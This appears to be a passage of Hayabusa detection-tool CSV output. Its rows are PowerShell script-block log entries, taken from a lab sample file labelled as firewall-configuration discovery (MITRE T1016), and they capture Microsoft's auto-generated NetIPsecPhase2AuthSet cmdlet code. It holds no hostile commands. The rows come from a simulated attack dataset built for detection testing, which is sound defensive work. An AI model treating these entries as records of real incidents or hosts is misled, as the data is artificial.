[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPs",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 